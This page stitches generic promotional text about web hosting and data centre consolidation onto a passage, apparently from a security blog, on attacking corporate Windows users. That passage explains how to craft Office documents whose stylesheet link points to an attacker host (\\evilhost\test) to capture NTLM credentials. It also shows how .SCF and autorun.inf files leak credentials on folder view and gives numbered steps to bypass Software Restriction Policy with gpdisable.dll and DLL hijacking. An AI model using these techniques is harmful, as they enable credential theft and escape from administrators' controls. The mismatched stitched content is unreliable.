Importance of Web Hosting Service in Internet World

Web hosting is a helpful Internet service which helps individuals and business to access their sites and contents through World Wide Web. Its offer space to users to stored their data and Internet connectivity through data center. A reputed web hosting service plays an important role for web masters and site owners to survive in this fast growing and changing Internet world.

Vital factors in selection of the Web Hosting Sites
In the ever changing Internet world you can search millions of web hosting sites for web hosting purposes. From these web hosting sites as a web site owners it is important to choose a valuable and purposeful web hosting provider that fulfill your requirements. To launch a web site or develop an online business, selection of the right and useful Website hosting is a very important step. Trustworthiness and Efficiency are the two major aspects to looks in any web hosting providers. Real time feedback's from the web site users in this web hosting review site allow web site owners to look into the specific services of these web hosting sites. It reviews and rates the best web hosting services along with the different services that they offer to web site owners. Below the list of vital point are given which can help the web site owner in time of selecting a right web hosting site -

* Check the money back option.
* Check the technical support of the web hosting site.
* Compare the price of the web hosting sites.
* Check the payment system of the web hosting sites.
* Check the band width and storage capacity of the web hosting sites.
* Check out the renewal and modification clause of the web hosting sites.
* Check the maintenance services of the web hosting sites.
* Check the customer reviews regarding the services of the web hosting sites.
* Check the web hosting site capabilities for your current and future web site requirements.

How to find the true Web Hosting Service Provider
In the Internet World web hosting in the need of the day for any web master. In Internet term web hosting sites are commonly known as a hosting service providers designed to provide desirable sites for web site owners and offer desirable space on a server for use by these web site owners as well as offering good Internet connectivity to personal and business customers in all over the world through data centre. In these days it is essential for any website owner to choose a trustworthy and high quality web host from the thousand of web hosting sites available for web hosting. In this scenario web hosting reviews site are more valuable for any website owners. 

Data center consolidation - Change the modern day's Business

Data center consolidation is a new innovative IT technology which is used for the modern day's digital security world. In simple term it refers to an organization's strategy to reduce business assets by using more efficient technologies and techniques of digitization world.. In the modern day's online business world Data becomes the key elements and life line of the business.

With the help of online search we can easily find the valuable data backup and recovery providers which effortlessly protect the data in real time. These data centre providers are well reputed and recognized name in the field of data recovery and backup service. They offer customers high quality and faster backup and recovery solutions which helps customers to reinforce their large volume of data protection. They provides the top class service of data centre consolidation which gives numerous benefits to business like improvement of service levels, increase availability and reduce costs compare with other sources.

With the help of new innovative technology, these online date centres makes business data more secure, efficient and responsive, so user can achieve the full business value of their information technology. These online data solution centres offers the numerous types of data solutions to their customers like data centres consolidation, data storage, storage virtualization, data protection and advanced networking according to their business requirement. These online Data recovery centres offer services to any single entity and big business houses regardless of sizes according to their budget and need. They offer 24x7 dedicated support staff for customers assistant.

Attacks on corporate users

Vulnerability in MS Office’s documents
As it was written in last blog post, we can create crafted Office’s document and send it to users (via e-mail for example). When a user opens it, an office program tries to connect our server and give us user’s credential.

Such situation is available because:
1)Almost all MS Office programs have capability to read “html”-file or “mht”-file*.
2)MS Office’s documents can be saved as “html”-file or “mht”-file* without loss of document’s formatting.
3)MS Office programs detect how to parse and process a document by it’s content, not by file extension.

*“mht”-file - MHTML, short for MIME HTML, is a web page archive format.

Thereby, we should do next sequence for creating crafted MS Office’s document.
We save any office document as “html”-file or “mht”-file. The second is better because there will be created only one file which contains all parts of the documents.
Then we change (or create) “HREF” attribute of “LINK rel=stylesheet” element from default value to a link to our server. Then we rename the file to a normal office document extension (doc for example). A crafted document is ready. The method is very simple as we can see.

Example of code:

    <link rel=stylesheet href=”\\evilhost\test”>

I want to mark out next interesting features.
Office programs understand “HREF” attribute both with a UNC path (\\evilhost\test) and with a HTTP path (http://evilhost/test). So we can catch user’s credentials via HTTP with NTLM.
MS Office programs show an attention to our victim if it couldn’t download content from a remote resource. This isn’t good. So we should put a document which we created for a victim on our shared resource. And when MS Office program opens a crafted document, it takes style sheet from our shared resource and doesn’t show an attention to a victim.

Windows Explorer and shared resources
In addition to the last blog post, we have found some specified files, which can give us necessary UNC-request from a user without attention to him.

- Autorun.inf
All of us know about “autorun.inf” and problems which it gives to common users via many kinds of viruses. Thereby, there are interesting things: autorun.inf can cause UNC-request by Explorer and it works with a Mapped Network Drives. But a last patch for Windows OS disables the Autorun functionality.

- .SCF file - Explorer Shell Command File.
This is a special file type, which contains commands for Windows Explorer. The example of such file is “ToggleDesktop” button. But information about all commands and all capabilities of the file type is not available. But this file extension “is one of the special ones that remains hidden even if you instruct Windows to show file extensions”.

For our purpose we can create or use any file, add next code to it and add “.SCF” to file extension. An original file extension will be shown to a user, but Explorer will see .scf and perform all the commands in that are in this file. Explorer gives user’s credential when user

looks at folder with such .scf file.


Steps to bypass SRP in Different OS

Steps to bypass SRP for XP:

Below are the steps which are useful to bypass SRP in XP operating systerm -

1. rename gpdisable.dll to deskpan.dll;
2. create a new folder and name it as files.{42071714-76d4-11d1-8b24-00a0c9068ff3};
3. place deskpan.dll to the new folder;
4. open the folder;
5. create a new rich text document in the folder;
6. double-click the rich-text document.
7. Wordpad runs with gpdisable.dll
8. Bypassed :) We can run any process.

There are similar steps for Windows Vista/7 and others.
In addition, all that steps we can do from “Open” or “Save As” dialogue, that can be useful for Citrix systems.

Universal way to bypass Group Policy by Limited User

Group policy is a powerful feature of Windows OS.

From wiki: “Group Policy is a set of rules which control the working environment of user accounts and computer accounts. Group Policy provides the centralized management and configuration of operating systems, applications and users' settings in an Active Directory environment“

For example, it can block users’ access to Regedit or IE proxy changing. So it is additional limits for users, besides file system and other permissions.
One of the main parts of Group Policy is represented by Software Restriction Policy (SRP). Administrator can set a little list of software which can be run by limited user with SRP.
Therefore, SRP can level up security of whole system by restricting user’s rights.

How does it work?
When a user launches a process it’s the parent process that checks SRP to see if the execution of the child should be allowed or blocked. The parent process uses NtQueryValueKey to query the Registry value HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\TransparentEnabled, which if present and non-zero indicates that SRP is turned on.

How can we bypass it?
There are few different.
Their main idea is that SRP check is situated in user space. A parent process is owned by a limited user. Therefore, a user can bypass SRP by different memory manipulations.

Marc Russinovich posted a great tool – Gpdisable and a good explanation of SRP on his blog. Gpdisable is now unavailable, but it can be found in Internet
Gpdisable uses dll-injection techniques, to inject into a parent process memory. Then “it fools the SRP code by returning an error value”, when SRP tries to query TransparentEnabled. Therefore, a parent process can run any other process.

Gpdisable consists of 2 files – gpdisable.exe and gpdisable.dll.
gpdisable.exe – inject DLL into process.
gpdisable.dll – DLL for bypassing SRP.
But in real life, there is a problem - to inject gpdisable.dll. Because in a good restricted system a user has access to run only software from white list. So you should run gpdisable.exe, but you don’t have right to do it.

Real Attack!
When I read about binary planting, I’ve got an idea how we can inject gpdisable.dll in process. It’s simple – dll-hijacking. But almost all big software (like MS Word, Excel and Notepad :) doesn’t have such vulnerabilities. That’s bad.But if we use "advanced" dll-hijacking (COM server-based binary planting), we can do it almost of all software. I won’t retell an idea of such binary planting, but you can get it from Acros Security Blog.